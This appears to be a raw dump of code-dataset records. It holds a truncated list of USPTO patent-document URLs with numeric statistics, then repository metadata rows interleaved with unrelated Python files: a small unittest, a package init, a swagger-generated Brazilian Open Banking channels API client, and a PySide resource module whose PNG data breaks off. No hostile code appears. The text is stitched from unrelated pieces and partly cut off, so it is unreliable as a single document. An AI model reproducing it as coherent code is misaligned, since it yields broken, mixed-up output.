0172577:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=G9NNG8EOPPOPPY5&lang=DINO”,
0172577:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=G9NNG8RLPPOPPY5&lang=DINO”,
0172577:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FIQOVQMRPPOPPY5&lang=DINO”,
0172577:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FH26DQSXPPOPPY5&lang=DINO”,
0172577:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FF3B5ETIPPOPPY5&lang=DINO”,
0253412:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=I1AQBVE8PXXIFW4&lang=DINO”,
0253412:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=I1AQBVEPPXXIFW4&lang=DINO”,
0253412:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=I1AQBVFEPXXIFW4&lang=DINO”,
0253412:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=I1AQBVFNPXXIFW4&lang=DINO”,
0253412:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HVGQLQFLPXXIFW4&lang=DINO”,
0253412:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HTFP6HQGPXXIFW4&lang=DINO”,
0253412:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HTFP6ODNPXXIFW4&lang=DINO”,
0235166:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HYTE47GSPXXIFW4&lang=DINO”,
0235166:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HXYTZX09PXXIFW3&lang=DINO”,
0235166:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HY0CBY30PXXIFW1&lang=DINO”,
0235166:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HXM56SG0PXXIFW3&lang=DINO”,
0235166:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HUFHPTQOPXXIFW4&lang=DINO”,
0235166:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HCKGGBW4PXXIFW1&lang=DINO”,
0235166:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=H8R8JJ5IPXXIFW4&lang=DINO”,
0235166:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GMJA0BD1PPOPPY2&lang=DINO”,
D701504S:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HSFFULBQPXXIFW4&lang=DINO”,
D701504S:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HQGZBINOPXXIFW3&lang=DINO”,
D701504S:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HN1TC3FQPXXIFW4&lang=DINO”,
D701504S:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HLTC0IKJPXXIFW4&lang=DINO”,
D701504S:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HLJN30GVPXXIFW3&lang=DINO”,
0177877:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HWXUU20UPXXIFW4&lang=DINO”,
0177877:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HHAK0G2BPXXIFW4&lang=DINO”,
0177877:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HHAK0GUPPXXIFW4&lang=DINO”,
0177877:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HFX8B5XVPXXIFW3&lang=DINO”,
0177877:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HFX8B60WPXXIFW3&lang=DINO”,
0177877:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HFX8B620PXXIFW3&lang=DINO”,
0081179:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=F2TE48J7PPOPPY5&lang=DINO”,
0081179:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=EUTUB94OPPOPPY2&lang=DINO”,
0081179:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=ERUVVRHAPPOPPY2&lang=DINO”,
0081179:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=ERUVVRI4PPOPPY2&lang=DINO”,
0081179:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=EK9XV5K5PP1GUI2&lang=DINO”,
0081179:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=E0VLY8H2PP2GUI1&lang=DINO”,
0235348:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HGP3KY7SPXXIFW4&lang=DINO”,
0235348:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HF4Y5OG3PXXIFW3&lang=DINO”,
0235348:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HF4Y5OHHPXXIFW3&lang=DINO”,
0235348:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HCL81ZF6PXXIFW4&lang=DINO”,
0235348:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HBYBZS76PXXIFW3&lang=DINO”,
0235348:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=H8PXY3K5PXXIFW4&lang=DINO”,
0216065:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=I3UOEMTOPXXIFW3&lang=DINO”,
0216065:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=I3ZRR92OPXXIFW2&lang=DINO”,
0216065:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=I3ZRR94KPXXIFW2&lang=DINO”,
0216065:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=I3Q7B8G4PXXIFW4&lang=DINO”,
0216065:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=I3Q7B8HRPXXIFW4&lang=DINO”,
0216065:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HW0SDLKRPXXIFW3&lang=DINO”,
0216065:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HW3IP7DAPXXIFW4&lang=DINO”
}
| 95.752577
| 97
| 0.82472
| 3,446
| 27,864
| 6.668311
| 0.092571
| 0.124897
| 0.187345
| 0.224814
| 0.815614
| 0.815614
| 0.815614
| 0.815614
| 0.815614
| 0.813134
| 0
| 0.102016
| 0.010408
| 27,864
| 290
| 98
| 96.082759
| 0.731341
| 0
| 0
| 0.020761
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
172894db1e0ac4db5f9ed2e13469bc0ecec922b1
| 744
|
py
|
Python
|
clase1/test_dr_lothar.py
|
martinadwek/python_course
|
a2c29bed2c616e1382dd5768588af1e27312ce52
|
[
"MIT"
] | null | null | null |
clase1/test_dr_lothar.py
|
martinadwek/python_course
|
a2c29bed2c616e1382dd5768588af1e27312ce52
|
[
"MIT"
] | null | null | null |
clase1/test_dr_lothar.py
|
martinadwek/python_course
|
a2c29bed2c616e1382dd5768588af1e27312ce52
|
[
"MIT"
] | null | null | null |
import unittest
from clase1.dr_lothar import dr_lothar, dr_lothar_rec
class DrLotharTestCase(unittest.TestCase):
def test_even_number(self):
self.assertEqual(8, dr_lothar(6))
def test_odd_number(self):
self.assertEqual(7, dr_lothar(3))
def test_leq_zero_number(self):
with self.assertRaises(ValueError):
dr_lothar(-1)
class DrLotharRecTestCase(unittest.TestCase):
def test_even_number(self):
self.assertEqual(8, dr_lothar_rec(6, 0))
def test_odd_number(self):
self.assertEqual(7, dr_lothar_rec(3, 0))
def test_leq_zero_number(self):
with self.assertRaises(ValueError):
dr_lothar_rec(-1, 0)
if __name__ == '__main__':
unittest.main()
| 23.25
| 53
| 0.686828
| 101
| 744
| 4.712871
| 0.316832
| 0.151261
| 0.092437
| 0.210084
| 0.701681
| 0.701681
| 0.701681
| 0.701681
| 0.701681
| 0.701681
| 0
| 0.02381
| 0.209677
| 744
| 31
| 54
| 24
| 0.785714
| 0
| 0
| 0.4
| 0
| 0
| 0.010753
| 0
| 0
| 0
| 0
| 0
| 0.3
| 1
| 0.3
| false
| 0
| 0.1
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1750bf272701dfd751b845c27ce6a3c46dbf1c09
| 159
|
py
|
Python
|
pygpe/spin_1/__init__.py
|
wheelerMT/pygpe
|
c0dc5dc7d2d6778b50103e47a3590472ee218261
|
[
"MIT"
] | null | null | null |
pygpe/spin_1/__init__.py
|
wheelerMT/pygpe
|
c0dc5dc7d2d6778b50103e47a3590472ee218261
|
[
"MIT"
] | null | null | null |
pygpe/spin_1/__init__.py
|
wheelerMT/pygpe
|
c0dc5dc7d2d6778b50103e47a3590472ee218261
|
[
"MIT"
] | null | null | null |
from . import evolution
from .evolution import *
from . import wavefunction
from .wavefunction import *
from . import data_manager
from .data_manager import *
| 22.714286
| 27
| 0.792453
| 20
| 159
| 6.2
| 0.3
| 0.241935
| 0.258065
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.150943
| 159
| 6
| 28
| 26.5
| 0.918519
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
bd5e44e95d6648c56f19a535c6cb3630b6733d0d
| 20,756
|
py
|
Python
|
channels_client/api/channels_api.py
|
pitzer42/opbk-br-quickstart
|
b3f86b2e5f82a6090aaefb563614e174a452383c
|
[
"MIT"
] | 2
|
2021-02-07T23:58:36.000Z
|
2021-02-08T01:03:25.000Z
|
channels_client/api/channels_api.py
|
pitzer42/opbk-br-quickstart
|
b3f86b2e5f82a6090aaefb563614e174a452383c
|
[
"MIT"
] | null | null | null |
channels_client/api/channels_api.py
|
pitzer42/opbk-br-quickstart
|
b3f86b2e5f82a6090aaefb563614e174a452383c
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
APIs OpenData do Open Banking Brasil
As APIs descritas neste documento são referentes as APIs da fase OpenData do Open Banking Brasil. # noqa: E501
OpenAPI spec version: 1.0.0-rc5.2
Contact: apiteam@swagger.io
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from channels_client.api_client import ApiClient
class ChannelsApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def get_banking_agents(self, **kwargs): # noqa: E501
"""Obtém a lista de correspondentes bancários da instituição financeira. # noqa: E501
Método para obter a lista de correspondentes bancários da instituição financeira. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_banking_agents(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page: Número da página que está sendo requisitada (o valor da primeira página é 1).
:param int page_size: Quantidade total de registros por páginas.
:return: ResponseBankingAgentsList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_banking_agents_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_banking_agents_with_http_info(**kwargs) # noqa: E501
return data
def get_banking_agents_with_http_info(self, **kwargs): # noqa: E501
"""Obtém a lista de correspondentes bancários da instituição financeira. # noqa: E501
Método para obter a lista de correspondentes bancários da instituição financeira. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_banking_agents_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page: Número da página que está sendo requisitada (o valor da primeira página é 1).
:param int page_size: Quantidade total de registros por páginas.
:return: ResponseBankingAgentsList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['page', 'page_size'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_banking_agents" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'page_size' in params:
query_params.append(('page-size', params['page_size'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/banking-agents', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseBankingAgentsList', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_branches(self, **kwargs): # noqa: E501
"""Obtém a lista de dependências próprias da instituição financeira. # noqa: E501
Método para obter a lista de dependências próprias da instituição financeira. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_branches(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page: Número da página que está sendo requisitada (o valor da primeira página é 1).
:param int page_size: Quantidade total de registros por páginas.
:return: ResponseBranchesList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_branches_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_branches_with_http_info(**kwargs) # noqa: E501
return data
def get_branches_with_http_info(self, **kwargs): # noqa: E501
"""Obtém a lista de dependências próprias da instituição financeira. # noqa: E501
Método para obter a lista de dependências próprias da instituição financeira. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_branches_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page: Número da página que está sendo requisitada (o valor da primeira página é 1).
:param int page_size: Quantidade total de registros por páginas.
:return: ResponseBranchesList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['page', 'page_size'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_branches" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'page_size' in params:
query_params.append(('page-size', params['page_size'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/branches', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseBranchesList', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_electronic_channels(self, **kwargs): # noqa: E501
"""Obtém a lista de canais eletrônicos de atendimento da instituição financeira. # noqa: E501
Método para obter a lista de canais eletrônicos de atendimento da instituição financeira. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_electronic_channels(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page: Número da página que está sendo requisitada (o valor da primeira página é 1).
:param int page_size: Quantidade total de registros por páginas.
:return: ResponseElectronicChannelsList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_electronic_channels_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_electronic_channels_with_http_info(**kwargs) # noqa: E501
return data
def get_electronic_channels_with_http_info(self, **kwargs): # noqa: E501
"""Obtém a lista de canais eletrônicos de atendimento da instituição financeira. # noqa: E501
Método para obter a lista de canais eletrônicos de atendimento da instituição financeira. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_electronic_channels_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page: Número da página que está sendo requisitada (o valor da primeira página é 1).
:param int page_size: Quantidade total de registros por páginas.
:return: ResponseElectronicChannelsList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['page', 'page_size'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_electronic_channels" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'page_size' in params:
query_params.append(('page-size', params['page_size'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/electronic-channels', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseElectronicChannelsList', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_phone_channels(self, **kwargs): # noqa: E501
"""Obtém a lista de canais telefônicos de atendimento da instituição financeira. # noqa: E501
Método para obter a lista de canais telefônicos de atendimento da instituição financeira. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_phone_channels(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page: Número da página que está sendo requisitada (o valor da primeira página é 1).
:param int page_size: Quantidade total de registros por páginas.
:return: ResponsePhoneChannelsList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_phone_channels_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_phone_channels_with_http_info(**kwargs) # noqa: E501
return data
def get_phone_channels_with_http_info(self, **kwargs): # noqa: E501
"""Obtém a lista de canais telefônicos de atendimento da instituição financeira. # noqa: E501
Método para obter a lista de canais telefônicos de atendimento da instituição financeira. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_phone_channels_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page: Número da página que está sendo requisitada (o valor da primeira página é 1).
:param int page_size: Quantidade total de registros por páginas.
:return: ResponsePhoneChannelsList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['page', 'page_size'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_phone_channels" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'page_size' in params:
query_params.append(('page-size', params['page_size'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/phone-channels', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponsePhoneChannelsList', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_shared_automated_teller_machines(self, **kwargs): # noqa: E501
"""Obtém a lista de terminais compartilhados de autoatendimento. # noqa: E501
Método para obter a lista de terminais compartilhados de autoatendimento da instituição financeira. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_shared_automated_teller_machines(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page: Número da página que está sendo requisitada (o valor da primeira página é 1).
:param int page_size: Quantidade total de registros por páginas.
:return: ResponseSharedAutomatedTellerMachinesList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_shared_automated_teller_machines_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_shared_automated_teller_machines_with_http_info(**kwargs) # noqa: E501
return data
def get_shared_automated_teller_machines_with_http_info(self, **kwargs): # noqa: E501
"""Obtém a lista de terminais compartilhados de autoatendimento. # noqa: E501
Método para obter a lista de terminais compartilhados de autoatendimento da instituição financeira. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_shared_automated_teller_machines_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page: Número da página que está sendo requisitada (o valor da primeira página é 1).
:param int page_size: Quantidade total de registros por páginas.
:return: ResponseSharedAutomatedTellerMachinesList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['page', 'page_size'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_shared_automated_teller_machines" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'page_size' in params:
query_params.append(('page-size', params['page_size'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/shared-automated-teller-machines', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseSharedAutomatedTellerMachinesList', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 40.777996
| 121
| 0.628348
| 2,408
| 20,756
| 5.188538
| 0.081395
| 0.045462
| 0.022411
| 0.028814
| 0.940211
| 0.932928
| 0.928366
| 0.922283
| 0.919962
| 0.918681
| 0
| 0.01586
| 0.289169
| 20,756
| 508
| 122
| 40.858268
| 0.830961
| 0.401571
| 0
| 0.814394
| 0
| 0
| 0.161162
| 0.048083
| 0
| 0
| 0
| 0.019685
| 0
| 1
| 0.041667
| false
| 0
| 0.015152
| 0
| 0.117424
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
bd6713e63fcb0649ac53bc667d0da5111e2d0369
| 14,964
|
py
|
Python
|
install/app_store/tk-framework-qtwidgets/v2.6.5/python/overlay_widget/ui/resources_rc.py
|
JoanAzpeitia/lp_sg
|
e0ee79555e419dd2ae3a5f31e5515b3f40b22a62
|
[
"MIT"
] | null | null | null |
install/app_store/tk-framework-qtwidgets/v2.6.5/python/overlay_widget/ui/resources_rc.py
|
JoanAzpeitia/lp_sg
|
e0ee79555e419dd2ae3a5f31e5515b3f40b22a62
|
[
"MIT"
] | null | null | null |
install/app_store/tk-framework-qtwidgets/v2.6.5/python/overlay_widget/ui/resources_rc.py
|
JoanAzpeitia/lp_sg
|
e0ee79555e419dd2ae3a5f31e5515b3f40b22a62
|
[
"MIT"
] | 1
|
2020-02-15T10:42:56.000Z
|
2020-02-15T10:42:56.000Z
|
# -*- coding: utf-8 -*-
# Resource object code
#
# by: The Resource Compiler for PySide (Qt v4.8.7)
#
# WARNING! All changes made in this file will be lost!
from tank.platform.qt import QtCore
qt_resource_data = "\x00\x00\x12\xea\x89PNG\x0d\x0a\x1a\x0a\x00\x00\x00\x0dIHDR\x00\x00\x00<\x00\x00\x00 \x08\x06\x00\x00\x00N\xe8\x1b\x92\x00\x00\x03\xe8iCCPicc\x00\x008\x8d\x8dU\xddo\xdbT\x14?\x89o\x5c\xa4\x16?\xa0\xb1\x8e\x0e\x15\x8b\xafUS[\xb9\x1b\x1a\xad\xc6\x06I\x93\xa5\xe9B\x1a\xb9\xcd\xd8*\xa4\xc9un\x1aS\xd76\xb6\xd3mU\x9f\xf6\x02o\x0c\xf8\x03\x80\xb2\x07\x1e\x90xB\x1a\x0c\xc4\xf6\xb2\xed\x01\xb4ISA\x15\xd5$\xa4=t\xda@h\x93\xf6\x82\xaap\xae\xafS\xbb]\xc6\xb8\x91\xaf\x7f9\xe7w>\xef\xd15@\xc7W\x9a\xe3\x98I\x19`\xde\xf2]5\x9f\x91\x8f\x9f\x98\x96;V!\x09\xcfA'\xf4@\xa7\xa6{N\xba\x5c.\x02.\xc6\x85G\xd6\xc3_!\xc1\xde7\x07\xda\xeb\xffsuV\xa9\xa7\x03$\x9eBlW=}\x1e\xf1i\x80\x94\xa9;\xae\x0f \xdeF\xf9\xf0)\xdfA\xdc\xf1<\xe2\x1d.&\x88Xax\x96\xe3,\xc33\x1c\x1f\x0f8S\xea(b\x96\x8b\xa4\xd7\xb5*\xe2%\xc4\xfd31\xf9l\x0c\xf3\x1c\x82\xb5#O-\xea\x1a\xba\xcczQv\xed\x9aa\xd2X\xbaOP\xff\xcf5o6Z\xf1z\xf1\xe9\xf2\xe6&\x8f\xe2\xbb\x8f\xd5^w\xc7\xd4\x10\x7f\xaek\xb9I\xc4/#\xbe\xe6\xf8\x19&\x7f\x15\xf1\xbd\xc6\x5c%\x8dx/@\xf2\x99\x9a{\xa4\xc2\xf9\xc97\x16\xebS\xef \xde\x89\xb8j\xf8\x85\xa9P\xbeh\xcd\x94&\xb8mry\xce>\xaa\x86\x9ck\xba7\x8a=\x83\x17\x11\xdf\xaa\xd3B\x91\xe7#@\x95fs\xac_\x88{\xeb\x8d\xb1\xd0\xbf0\xee-L\xe6Z~\x16\xeb\xa3%\xeeGp\xdf\xd3\xc6\xcb\x88{\x10\x7f\xe8\xda\xea\x04\xcfYX\xa6f^\xe5\xfe\x85+\x8e_\x0es\x10\xd6-\xb3T\xe4>\x89D\xbd\xa0\xc6@\xee\xd7\xa7\xc6\xb8-9\xe0\xe3!r[2]3\x8e\x14B\xfe\x92c\x06\xb3\x88\xb9\x91\xf3nC\xad\x84\x9c\x1b\x9a\x9b\xcbs?\xe4>\xb5*\xa1\xcf\xd4\xae\xaa\x96e\xbd\x1dD|\x18\x8e%4\xa0`\xc3\x0c\xee:X\xb0\x012\xa8\x90\x87\x0c\xbe\x1dpQS\x03\x03L\x94P\xd4R\x94\x18\x89\xa7a\x0ee\xedy\xe5\x80\xc3q\xc4\x98\x0d\xac\xd7\x995Fi\xcf\xe1\x11\xee\x84\x1c\x9bt\x13\x85\xec\xc7\xe7 )\x92Cd\x98\x8c\x80L\xde$o\x91\xc3$\x8b\xd2\x11rp\xd3\xb6\x1c\x8b\xcfb\xdd\xd9\xf4\xf3>4\xd0+\xe3\x1d\x83\xcc\xb9\x9eF_\x14\xef\xac{\xd2\xd0\xaf\x7f\xf4\xf7\x16k\xfb\x91\x9ci+\x9fx\x07\xc0\xc3\x0e\xb4\x98\x03\xf1\xfa\xaf.\xfd\xb0+\xf2\xb1B.\xbc{\xb3\xeb\xea\x12L<\xa9\xbf\xa9\xdb\xa9\xf5\xd4\x0a\xee\xab\xa9\xb5\x88\x91\xfa=\xb5\x86\xbfUHcnf\x90\xd1<>F\x90\x87\x17\xcb 